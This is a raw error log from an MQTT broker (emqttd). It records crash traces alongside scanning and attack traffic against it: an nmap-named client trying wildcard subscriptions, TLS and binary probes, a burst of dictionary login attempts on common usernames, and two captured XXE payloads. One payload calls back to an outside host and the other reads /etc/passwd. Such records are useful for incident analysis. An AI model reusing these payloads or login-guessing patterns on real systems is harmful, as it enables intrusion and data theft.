2019-02-15 17:07:33.367 [error] <0.1498.0> gen_server <0.1498.0> terminated with reason: no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/EquipmentSituat...">>,...}]},...}, {proto_state,{{117,48,224,90},60260},#Fun<emqttd_client.0.18944683>,true,<<"equipment1">>,<0.1498.0>,...}) line 191
2019-02-15 17:07:33.367 [error] <0.1498.0> CRASH REPORT Process <0.1498.0> with 0 neighbours exited with reason: no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/EquipmentSituat...">>,...}]},...}, {proto_state,{{117,48,224,90},60260},#Fun<emqttd_client.0.18944683>,true,<<"equipment1">>,<0.1498.0>,...}) line 191 in gen_server2:terminate/3 line 1157
2019-02-15 17:07:33.368 [error] <0.1431.0> Supervisor 'esockd_connection_sup - <0.1431.0>' had child connection started with emqttd_client:start_link([{max_publish_rate,0},{client_idle_timeout,30000},{client_enable_stats,false},{max_clientid_len,...},...]) at <0.1498.0> exit with reason no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/EquipmentSituat...">>,...}]},...}, {proto_state,{{117,48,224,90},60260},#Fun<emqttd_client.0.18944683>,true,<<"equipment1">>,<0.1498.0>,...}) line 191 in context connection_crashed
2019-02-15 17:08:29.520 [error] <0.1540.0>@emqttd_http:authorized:142 HTTP Auth failure: username=admin, reason="Password error"
2019-02-15 17:16:55.316 [error] <0.1896.0>@emqttd_ws:handle_request:73 Unexpected WS Request: GET /
2019-02-15 17:16:55.405 [error] <0.1901.0>@emqttd_ws:handle_request:73 Unexpected WS Request: GET /nice ports,/Trinity.txt.bak
2019-02-15 17:17:00.546 [error] <0.1905.0>@emqttd_ws:handle_request:73 Unexpected WS Request: OPTIONS /
2019-02-15 17:17:33.423 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.1957.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.2692>,#Fun<esockd_transport.2.122912610>,[]]},'OPTIONS',...]}, 'OPTIONS') line 67 in context connection_crashed
2019-02-15 17:17:33.424 [error] emulator Error in process <0.1957.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.2692>,#Fun<esockd_transport.2.122912610>,[]]},'OPTIONS',"/",{1,0},{0,nil}]},'OPTIONS'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 17:17:57.095 [error] <0.2010.0> SSL: hello: tls_handshake.erl:191:Fatal error: protocol version
2019-02-15 17:21:20.181 [error] <0.2222.0> gen_server <0.2222.0> terminated with reason: no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/Consumption">>,...}]},...}, {proto_state,{{117,48,224,90},60396},#Fun<emqttd_client.0.18944683>,true,<<"6067">>,<0.2222.0>,true,...}) line 191
2019-02-15 17:21:20.182 [error] <0.2222.0> CRASH REPORT Process <0.2222.0> with 0 neighbours exited with reason: no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/Consumption">>,...}]},...}, {proto_state,{{117,48,224,90},60396},#Fun<emqttd_client.0.18944683>,true,<<"6067">>,<0.2222.0>,true,...}) line 191 in gen_server2:terminate/3 line 1157
2019-02-15 17:21:20.182 [error] <0.1431.0> Supervisor 'esockd_connection_sup - <0.1431.0>' had child connection started with emqttd_client:start_link([{max_publish_rate,0},{client_idle_timeout,30000},{client_enable_stats,false},{max_clientid_len,...},...]) at <0.2222.0> exit with reason no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/Consumption">>,...}]},...}, {proto_state,{{117,48,224,90},60396},#Fun<emqttd_client.0.18944683>,true,<<"6067">>,<0.2222.0>,true,...}) line 191 in context connection_crashed
2019-02-15 17:41:45.900 [error] <0.3041.0> gen_server <0.3041.0> terminated with reason: no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/Consumption">>,...}]},...}, {proto_state,{{117,48,224,90},60604},#Fun<emqttd_client.0.18944683>,true,<<"6067">>,<0.3041.0>,true,...}) line 191
2019-02-15 17:41:45.900 [error] <0.3041.0> CRASH REPORT Process <0.3041.0> with 0 neighbours exited with reason: no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/Consumption">>,...}]},...}, {proto_state,{{117,48,224,90},60604},#Fun<emqttd_client.0.18944683>,true,<<"6067">>,<0.3041.0>,true,...}) line 191 in gen_server2:terminate/3 line 1157
2019-02-15 17:41:45.901 [error] <0.1431.0> Supervisor 'esockd_connection_sup - <0.1431.0>' had child connection started with emqttd_client:start_link([{max_publish_rate,0},{client_idle_timeout,30000},{client_enable_stats,false},{max_clientid_len,...},...]) at <0.3041.0> exit with reason no function clause matching emqttd_protocol:process({mqtt_packet,{mqtt_packet_header,8,false,2,false},{mqtt_packet_subscribe,1,[{<<"/Consumption">>,...}]},...}, {proto_state,{{117,48,224,90},60604},#Fun<emqttd_client.0.18944683>,true,<<"6067">>,<0.3041.0>,true,...}) line 191 in context connection_crashed
2019-02-15 18:14:43.862 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.4049.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.3733>,#Fun<esockd_transport.2.122912610>,[]]},'OPTIONS',...]}, 'OPTIONS') line 67 in context connection_crashed
2019-02-15 18:14:43.863 [error] emulator Error in process <0.4049.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.3733>,#Fun<esockd_transport.2.122912610>,[]]},'OPTIONS',"/",{1,0},{0,nil}]},'OPTIONS'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 18:14:45.620 [error] <0.4054.0> SSL: hello: tls_handshake.erl:191:Fatal error: protocol version
2019-02-15 18:14:45.704 [error] <0.4056.0> SSL: hello: tls_handshake.erl:178:Fatal error: insufficient security - no_suitable_ciphers
2019-02-15 18:16:39.320 [error] <0.4170.0>@emqttd_protocol:process:290 Client(nmapSZPRHDNUGIQZTZBH@116.196.81.45:39797): Cannot SUBSCRIBE [{<<"$SYS/#">>,[{qos,0}]},{<<"#">>,[{qos,0}]}] for ACL Deny
2019-02-15 18:16:40.485 [error] <0.4180.0> SSL: hello: tls_handshake.erl:178:Fatal error: insufficient security - no_suitable_ciphers
2019-02-15 18:16:50.572 [error] <0.4193.0>@emqttd_client:received:340 Client(116.196.81.45:40977): Parser failed for {function_clause,[{emqttd_parser,parse_utf,[<<3,0,255,0,0,0,16,0,0,5,0,0,4,1,0,128,0,0,2,0,0,8>>],[{file,"src/emqttd_parser.erl"},{line,206}]},{emqttd_parser,parse_topics,3,[{file,"src/emqttd_parser.erl"},{line,195}]},{emqttd_parser,parse_frame,3,[{file,"src/emqttd_parser.erl"},{line,147}]},{emqttd_client,received,2,[{file,"src/emqttd_client.erl"},{line,319}]},{gen_server2,handle_msg,2,[{file,"src/gen_server2.erl"},{line,1046}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]}
2019-02-15 18:16:50.573 [error] <0.4193.0>@emqttd_client:received:341 Client(116.196.81.45:40977): Error data: <<129,24,1,3,3,0,255,0,0,0,16,0,0,5,0,0,4,1,0,128,0,0,2,0,0,8,0,0,20,0,0,3,0,0,1,0,0,21,0,0,6,0,0,22,0,0,23,0,0,51,0,0,57,0,0,25,0,0,58,0,0,26,0,0,24,0,0,53,0,0,9,0,0,10,0,0,27,0,0,47,0,0,52,0,0,59,0,0,165,0,0,163,0,0,161,0,0,159,0,0,107,0,0,106,0,0,105,0,0,104,0,0,56,0,0,55,0,0,54,0,0,136,0,0,135,0,0,134,0,0,133,0,0,167,0,0,109,0,0,137,0,0,157,0,0,61,0,0,132,0,0,164,0,0,162,0,0,160,0,0,158,0,0,103,0,0,64,0,0,63,0,0,62,0,0,50,0,0,49,0,0,48,0,0,154,0,0,153,0,0,152,0,0,151,0,0,69,0,0,68,0,0,67,0,0,66,0,0,166,0,0,108,0,0,155,0,0,70,0,0,156,0,0,60,0,0,150,0,0,65,0,0,7,5,0,128,3,0,128,0,0,19,0,0,16,0,0,13,7,0,192,0,0,18,0,0,15,0,0,12,0,0,17,0,0,255,129,144,68,158,119,72,181,211,253,24,136,118,212,223,118,67>>
2019-02-15 18:16:51.207 [error] <0.4194.0>@emqttd_client:received:340 Client(116.196.81.45:41154): Parser failed for {function_clause,[{emqttd_parser,parse_utf,[<<1,2,0>>],[{file,"src/emqttd_parser.erl"},{line,206}]},{emqttd_parser,parse_frame,3,[{file,"src/emqttd_parser.erl"},{line,80}]},{emqttd_client,received,2,[{file,"src/emqttd_client.erl"},{line,319}]},{gen_server2,handle_msg,2,[{file,"src/gen_server2.erl"},{line,1046}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]}
2019-02-15 18:16:51.208 [error] <0.4194.0>@emqttd_client:received:341 Client(116.196.81.45:41154): Error data: <<22,3,1,2,0,1,0,1,252,3,3,134,38,7,156,73,232,139,217,160,165,255,182,160,249,47,0,177,87,6,167,37,53,102,51,121,117,204,21,4,219,183,152,0,0,244,0,5,0,4,0,2,0,8,0,20,0,3,0,1,0,21,0,6,0,22,0,23,0,51,0,57,0,25,0,58,0,26,0,24,0,53,0,9,0,10,0,27,0,47,0,52,192,16,192,6,192,21,192,11,192,1,0,59,192,48,192,44,192,40,192,36,192,20,192,10,0,165,0,163,0,161,0,159,0,107,0,106,0,105,0,104,0,56,0,55,0,54,0,136,0,135,0,134,0,133,192,25,0,167,0,109,0,137,192,50,192,46,192,42,192,38,192,15,192,5,0,157,0,61,0,132,192,47,192,43,192,39,192,35,192,19,192,9,0,164,0,162,0,160,0,158,0,103,0,64,0,63,0,62,0,50,0,49,0,48,0,154,0,153,0,152,0,151,0,69,0,68,0,67,0,66,192,24,0,166,0,108,0,155,0,70,192,49,192,45,192,41,192,37,192,14,192,4,0,156,0,60,0,150,0,65,0,7,192,17,192,7,192,22,192,12,192,2,192,18,192,8,0,19,0,16,0,13,192,23,192,13,192,3,0,18,0,15,0,12,0,17,0,255,1,0,0,223,0,11,0,4,3,0,1,2,0,10,0,28,0,26,0,23,0,25,0,28,0,27,0,24,0,26,0,22,0,14,0,13,0,11,0,12,0,9,0,10,0,35,0,0,0,13,0,32,0,30,6,1,6,2,6,3,5,1,5,2,5,3,4,1,4,2,4,3,3,1,3,2,3,3,2,1,2,2,2,3,0,15,0,1,1,0,21,0,134,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0>>
2019-02-15 18:22:56.366 [error] <0.4452.0>@emqttd_client:received:340 Client(116.196.94.49:43290): Parser failed for {function_clause,[{emqttd_parser,parse_utf,[<<>>],[{file,"src/emqttd_parser.erl"},{line,206}]},{emqttd_parser,parse_frame,3,[{file,"src/emqttd_parser.erl"},{line,122}]},{emqttd_client,received,2,[{file,"src/emqttd_client.erl"},{line,319}]},{gen_server2,handle_msg,2,[{file,"src/gen_server2.erl"},{line,1046}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]}
2019-02-15 18:22:56.366 [error] <0.4452.0>@emqttd_client:received:341 Client(116.196.94.49:43290): Error data: <<58,0,0,0,2,0,0,0,0,0,0,0,212,7,0,0,0,0,0,0,97,100,109,105,110,46,36,99,109,100,0,0,0,0,0,255,255,255,255,19,0,0,0,16,105,115,109,97,115,116,101,114,0,1,0,0,0,0>>
2019-02-15 18:24:45.536 [error] <0.4732.0>@emqttd_client:received:340 Client(116.196.94.49:51419): Parser failed for {function_clause,[{emqttd_parser,parse_utf,[<<2,0,220>>],[{file,"src/emqttd_parser.erl"},{line,206}]},{emqttd_parser,parse_frame,3,[{file,"src/emqttd_parser.erl"},{line,80}]},{emqttd_client,received,2,[{file,"src/emqttd_client.erl"},{line,319}]},{gen_server2,handle_msg,2,[{file,"src/gen_server2.erl"},{line,1046}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]}
2019-02-15 18:24:45.536 [error] <0.4732.0>@emqttd_client:received:341 Client(116.196.94.49:51419): Error data: <<22,3,2,0,220,1,0,0,216,3,2,83,67,91,144,157,155,114,11,188,12,188,43,146,168,72,151,207,189,57,4,204,22,10,133,3,144,159,119,4,51,212,222,0,0,102,192,20,192,10,192,34,192,33,0,57,0,56,0,136,0,135,192,15,192,5,0,53,0,132,192,18,192,8,192,28,192,27,0,22,0,19,192,13,192,3,0,10,192,19,192,9,192,31,192,30,0,51,0,50,0,154,0,153,0,69,0,68,192,14,192,4,0,47,0,150,0,65,192,17,192,7,192,12,192,2,0,5,0,4,0,21,0,18,0,9,0,20,0,17,0,8,0,6,0,3,0,255,1,0,0,73,0,11,0,4,3,0,1,2,0,10,0,52,0,50,0,14,0,13,0,25,0,11,0,12,0,24,0,9,0,10,0,22,0,23,0,8,0,6,0,7,0,20,0,21,0,4,0,5,0,18,0,19,0,1,0,2,0,3,0,15,0,16,0,17,0,35,0,0,0,15,0,1,1>>
2019-02-15 18:29:59.926 [error] <0.5999.0>@emqttd_client:received:340 Client(116.196.94.49:52838): Parser failed for {{badmatch,{<<>>,<<>>}},[{emqttd_parser,parse_topics,3,[{file,"src/emqttd_parser.erl"},{line,195}]},{emqttd_parser,parse_frame,3,[{file,"src/emqttd_parser.erl"},{line,147}]},{emqttd_client,received,2,[{file,"src/emqttd_client.erl"},{line,319}]},{gen_server2,handle_msg,2,[{file,"src/gen_server2.erl"},{line,1046}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]}
2019-02-15 18:29:59.926 [error] <0.5999.0>@emqttd_client:received:341 Client(116.196.94.49:52838): Error data: <<128,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0>>
2019-02-15 18:36:36.303 [error] <0.7159.0>@emqttd_http:authorized:142 HTTP Auth failure: username=123456, reason="User not found"
2019-02-15 18:36:36.534 [error] <0.7162.0>@emqttd_http:authorized:142 HTTP Auth failure: username=123456, reason="User not found"
2019-02-15 18:36:36.549 [error] <0.7163.0>@emqttd_http:authorized:142 HTTP Auth failure: username=123456, reason="User not found"
2019-02-15 18:36:37.000 [error] <0.7165.0>@emqttd_http:authorized:142 HTTP Auth failure: username=access, reason="User not found"
2019-02-15 18:36:37.283 [error] <0.7166.0>@emqttd_http:authorized:142 HTTP Auth failure: username=access, reason="User not found"
2019-02-15 18:36:37.442 [error] <0.7167.0>@emqttd_http:authorized:142 HTTP Auth failure: username=123456, reason="User not found"
2019-02-15 18:36:37.531 [error] <0.7168.0>@emqttd_http:authorized:142 HTTP Auth failure: username=access, reason="User not found"
2019-02-15 18:36:37.660 [error] <0.7170.0>@emqttd_http:authorized:142 HTTP Auth failure: username=access, reason="User not found"
2019-02-15 18:36:37.774 [error] <0.7171.0>@emqttd_http:authorized:142 HTTP Auth failure: username=admin, reason="Password error"
2019-02-15 18:36:37.798 [error] <0.7173.0>@emqttd_http:authorized:142 HTTP Auth failure: username=access, reason="User not found"
2019-02-15 18:36:37.882 [error] <0.7174.0>@emqttd_http:authorized:142 HTTP Auth failure: username=admin, reason="Password error"
2019-02-15 18:36:38.245 [error] <0.7175.0>@emqttd_http:authorized:142 HTTP Auth failure: username=admin, reason="Password error"
2019-02-15 18:36:38.270 [error] <0.7176.0>@emqttd_http:authorized:142 HTTP Auth failure: username=admin, reason="Password error"
2019-02-15 18:36:39.065 [error] <0.7180.0>@emqttd_http:authorized:142 HTTP Auth failure: username=administrator, reason="User not found"
2019-02-15 18:36:39.105 [error] <0.7182.0>@emqttd_http:authorized:142 HTTP Auth failure: username=administrator, reason="User not found"
2019-02-15 18:36:39.810 [error] <0.7185.0>@emqttd_http:authorized:142 HTTP Auth failure: username=administrator, reason="User not found"
2019-02-15 18:36:39.931 [error] <0.7186.0>@emqttd_http:authorized:142 HTTP Auth failure: username=admin, reason="Password error"
2019-02-15 18:36:40.399 [error] <0.7187.0>@emqttd_http:authorized:142 HTTP Auth failure: username=administrator, reason="User not found"
2019-02-15 18:36:40.997 [error] <0.7191.0>@emqttd_http:authorized:142 HTTP Auth failure: username=backup, reason="User not found"
2019-02-15 18:36:41.385 [error] <0.7192.0>@emqttd_http:authorized:142 HTTP Auth failure: username=backup, reason="User not found"
2019-02-15 18:36:41.594 [error] <0.7193.0>@emqttd_http:authorized:142 HTTP Auth failure: username=backup, reason="User not found"
2019-02-15 18:36:41.698 [error] <0.7194.0>@emqttd_http:authorized:142 HTTP Auth failure: username=backup, reason="User not found"
2019-02-15 18:36:42.037 [error] <0.7199.0>@emqttd_http:authorized:142 HTTP Auth failure: username=common, reason="User not found"
2019-02-15 18:36:42.561 [error] <0.7200.0>@emqttd_http:authorized:142 HTTP Auth failure: username=common, reason="User not found"
2019-02-15 18:36:42.982 [error] <0.7202.0>@emqttd_http:authorized:142 HTTP Auth failure: username=backup, reason="User not found"
2019-02-15 18:36:43.033 [error] <0.7203.0>@emqttd_http:authorized:142 HTTP Auth failure: username=administrator, reason="User not found"
2019-02-15 18:36:44.214 [error] <0.7206.0>@emqttd_http:authorized:142 HTTP Auth failure: username=common, reason="User not found"
2019-02-15 18:36:44.814 [error] <0.7209.0>@emqttd_http:authorized:142 HTTP Auth failure: username=common, reason="User not found"
2019-02-15 18:36:45.312 [error] <0.7212.0>@emqttd_http:authorized:142 HTTP Auth failure: username=domain, reason="User not found"
2019-02-15 18:36:45.690 [error] <0.7213.0>@emqttd_http:authorized:142 HTTP Auth failure: username=domain, reason="User not found"
2019-02-15 18:36:45.955 [error] <0.7216.0>@emqttd_http:authorized:142 HTTP Auth failure: username=domain, reason="User not found"
2019-02-15 18:36:46.233 [error] <0.7218.0>@emqttd_http:authorized:142 HTTP Auth failure: username=common, reason="User not found"
2019-02-15 18:36:47.035 [error] <0.7221.0>@emqttd_http:authorized:142 HTTP Auth failure: username=domain, reason="User not found"
2019-02-15 18:36:47.323 [error] <0.7224.0>@emqttd_http:authorized:142 HTTP Auth failure: username=ghost, reason="User not found"
2019-02-15 18:36:47.724 [error] <0.7226.0>@emqttd_http:authorized:142 HTTP Auth failure: username=ghost, reason="User not found"
2019-02-15 18:36:47.910 [error] <0.7228.0>@emqttd_http:authorized:142 HTTP Auth failure: username=ghost, reason="User not found"
2019-02-15 18:36:48.034 [error] <0.7229.0>@emqttd_http:authorized:142 HTTP Auth failure: username=123456, reason="User not found"
2019-02-15 18:36:48.270 [error] <0.7230.0>@emqttd_http:authorized:142 HTTP Auth failure: username=ghost, reason="User not found"
2019-02-15 18:36:48.418 [error] <0.7231.0>@emqttd_http:authorized:142 HTTP Auth failure: username=ghost, reason="User not found"
2019-02-15 18:36:48.566 [error] <0.7232.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guest, reason="User not found"
2019-02-15 18:36:48.688 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.7233.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.5664>,#Fun<esockd_transport.2.122912610>,[]]},'POST',...]}, 'POST') line 67 in context connection_crashed
2019-02-15 18:36:48.689 [error] emulator Error in process <0.7233.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.5664>,#Fun<esockd_transport.2.122912610>,[]]},'POST',"/?=%3C%21DOCTYPE+foo+%5B%3C%21ELEMENT+foo+ANY+%3E%3C%21ENTITY+xxe+SYSTEM+%22http%3A%2F%2F116.196.112.30%3A8082%2F--dbd4af1f9ebca18671806cd83f7f7a70--%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E",{1,1},{11,{"host",{'Host',"117.48.206.233:8080"},{"accept-encoding",{'Accept-Encoding',"identity"},{"accept",{'Accept',"*/*"},nil,{"accept-charset",{'Accept-Charset',"GBK,utf-8;q=0.7,*;q=0.3"},nil,nil}},{"accept-language",{'Accept-Language',"zh-CN,zh;q=0.8"},nil,{"cache-control",{'Cache-Control',"max-age=0"},nil,{"connection",{'Connection',"keep-alive"},nil,{"content-type",{'Content-Type',"application/xml"},{"content-length",{'Content-Length',"138"},nil,nil},nil}}}}},{"referer",{'Referer',"https://www.jdcloud.com"},nil,{"user-agent",{'User-Agent',"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"},nil,nil}}}}]},'POST'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 18:36:48.960 [error] <0.7234.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guest, reason="User not found"
2019-02-15 18:36:49.092 [error] <0.7236.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guest, reason="User not found"
2019-02-15 18:36:49.231 [error] <0.7237.0>@emqttd_http:authorized:142 HTTP Auth failure: username=domain, reason="User not found"
2019-02-15 18:36:49.303 [error] <0.7239.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guest, reason="User not found"
2019-02-15 18:36:49.368 [error] <0.7240.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guest1, reason="User not found"
2019-02-15 18:36:49.417 [error] <0.7242.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guest, reason="User not found"
2019-02-15 18:36:49.710 [error] <0.7245.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guest1, reason="User not found"
2019-02-15 18:36:49.796 [error] <0.7246.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guest1, reason="User not found"
2019-02-15 18:36:49.819 [error] <0.7247.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guest1, reason="User not found"
2019-02-15 18:36:49.839 [error] <0.7248.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guest1, reason="User not found"
2019-02-15 18:36:50.032 [error] <0.7249.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guestuser, reason="User not found"
2019-02-15 18:36:50.293 [error] <0.7250.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guestuser, reason="User not found"
2019-02-15 18:36:50.384 [error] <0.7251.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guestuser, reason="User not found"
2019-02-15 18:36:50.521 [error] <0.7254.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guestuser, reason="User not found"
2019-02-15 18:36:50.591 [error] <0.7256.0>@emqttd_http:authorized:142 HTTP Auth failure: username=guestuser, reason="User not found"
2019-02-15 18:36:50.818 [error] <0.7257.0>@emqttd_http:authorized:142 HTTP Auth failure: username=hello, reason="User not found"
2019-02-15 18:36:50.972 [error] <0.7258.0>@emqttd_http:authorized:142 HTTP Auth failure: username=hello, reason="User not found"
2019-02-15 18:36:51.664 [error] <0.7259.0>@emqttd_http:authorized:142 HTTP Auth failure: username=hello, reason="User not found"
2019-02-15 18:36:51.738 [error] <0.7260.0>@emqttd_http:authorized:142 HTTP Auth failure: username=hello, reason="User not found"
2019-02-15 18:36:52.166 [error] <0.7261.0>@emqttd_http:authorized:142 HTTP Auth failure: username=root, reason="User not found"
2019-02-15 18:36:52.205 [error] <0.7262.0>@emqttd_http:authorized:142 HTTP Auth failure: username=hello, reason="User not found"
2019-02-15 18:36:52.365 [error] <0.7263.0>@emqttd_http:authorized:142 HTTP Auth failure: username=root, reason="User not found"
2019-02-15 18:36:52.642 [error] <0.7264.0>@emqttd_http:authorized:142 HTTP Auth failure: username=root, reason="User not found"
2019-02-15 18:36:53.088 [error] <0.7265.0>@emqttd_http:authorized:142 HTTP Auth failure: username=root, reason="User not found"
2019-02-15 18:36:53.586 [error] <0.7267.0>@emqttd_http:authorized:142 HTTP Auth failure: username=secret, reason="User not found"
2019-02-15 18:36:54.019 [error] <0.7270.0>@emqttd_http:authorized:142 HTTP Auth failure: username=root, reason="User not found"
2019-02-15 18:36:54.471 [error] <0.7272.0>@emqttd_http:authorized:142 HTTP Auth failure: username=secret, reason="User not found"
2019-02-15 18:36:54.985 [error] <0.7274.0>@emqttd_http:authorized:142 HTTP Auth failure: username=secret, reason="User not found"
2019-02-15 18:36:55.745 [error] <0.7275.0>@emqttd_http:authorized:142 HTTP Auth failure: username=secret, reason="User not found"
2019-02-15 18:36:55.882 [error] <0.1487.0> Supervisor 'esockd_connection_sup - <0.1487.0>' had child connection started with mochiweb_http:start_link({emqttd_http,handle_request,[{state,#Fun<emqttd_http.2.90041999>}]}) at <0.7277.0> exit with reason no function clause matching emqttd_http:handle_request("/", {mochiweb_request,[{esockd_connection,[#Port<0.5706>,#Fun<esockd_transport.2.122912610>,[]]},'POST',...]}, 'POST') line 67 in context connection_crashed
2019-02-15 18:36:55.883 [error] emulator Error in process <0.7277.0> on node 'emq@127.0.0.1' with exit value:
{function_clause,[{emqttd_http,handle_request,["/",{mochiweb_request,[{esockd_connection,[#Port<0.5706>,#Fun<esockd_transport.2.122912610>,[]]},'POST',"/?=%3C%21DOCTYPE+foo+%5B%3C%21ELEMENT+foo+ANY+%3E%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E",{1,1},{11,{"host",{'Host',"117.48.206.233:8080"},{"accept-encoding",{'Accept-Encoding',"identity"},{"accept",{'Accept',"*/*"},nil,{"accept-charset",{'Accept-Charset',"GBK,utf-8;q=0.7,*;q=0.3"},nil,nil}},{"accept-language",{'Accept-Language',"zh-CN,zh;q=0.8"},nil,{"cache-control",{'Cache-Control',"max-age=0"},nil,{"connection",{'Connection',"keep-alive"},nil,{"content-type",{'Content-Type',"application/xml"},{"content-length",{'Content-Length',"93"},nil,nil},nil}}}}},{"referer",{'Referer',"https://www.jdcloud.com"},nil,{"user-agent",{'User-Agent',"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"},nil,nil}}}}]},'POST'],[{file,"src/emqttd_http.erl"},{line,67}]},{mochiweb_http,headers,5,[{file,"src/mochiweb_http.erl"},{line,93}]}]}
2019-02-15 18:36:56.033 [error] <0.7278.0>@emqttd_http:authorized:142 HTTP Auth failure: username=secret, reason="User not found"
2019-02-15 18:36:56.258 [error] <0.7279.0>@emqttd_http:authorized:142 HTTP Auth failure: username=server, reason="User not found"
2019-02-15 18:36:56.701 [error] <0.7282.0>@emqttd_http:authorized:142 HTTP Auth failure: username=server, reason="User not found"
2019-02-15 18:36:56.911 [error] <0.7284.0>@emqttd_http:authorized:142 HTTP Auth failure: username=server, reason="User not found"
2019-02-15 18:36:57.103 [error] <0.7285.0>@emqttd_http:authorized:142 HTTP Auth failure: username=server, reason="User not found"
2019-02-15 18:36:57.347 [error] <0.7286.0>@emqttd_http:authorized:142 HTTP Auth failure: username=service, reason="User not found"
2019-02-15 18:36:57.423 [error] <0.7288.0>@emqttd_http:authorized:142 HTTP Auth failure: username=service, reason="User not found"
2019-02-15 18:36:57.654 [error] <0.7290.0>@emqttd_http:authorized:142 HTTP Auth failure: username=server, reason="User not found"
2019-02-15 18:36:57.782 [error] <0.7291.0>@emqttd_http:authorized:142 HTTP Auth failure: username=service, reason="User not found"
2019-02-15 18:36:57.897 [error] <0.7294.0>@emqttd_http:authorized:142 HTTP Auth failure: username=service, reason="User not found"
2019-02-15 18:36:58.513 [error] <0.7295.0>@emqttd_http:authorized:142 HTTP Auth failure: username=sys, reason="User not found"
2019-02-15 18:36:59.202 [error] <0.7298.0>@emqttd_http:authorized:142 HTTP Auth failure: username=service, reason="User not found"
2019-02-15 18:36:59.294 [error] <0.7299.0>@emqttd_http:authorized:142 HTTP Auth failure: username=sys, reason="User not found"
2019-02-15 18:36:59.901 [error] <0.7300.0>@emqttd_http:authorized:142 HTTP Auth failure: username=sys, reason="User not found"
2019-02-15 18:37:00.024 [error] <0.7301.0>@emqttd_http:authorized:142 HTTP Auth failure: username=sys, reason="User not found"
2019-02-15 18:37:00.584 [error] <0.7303.0>@emqttd_http:authorized:142 HTTP Auth failure: username=system, reason="User not found"
2019-02-15 18:37:01.723 [error] <0.7308.0>@emqttd_http:authorized:142 HTTP Auth failure: username=system, reason="User not found"
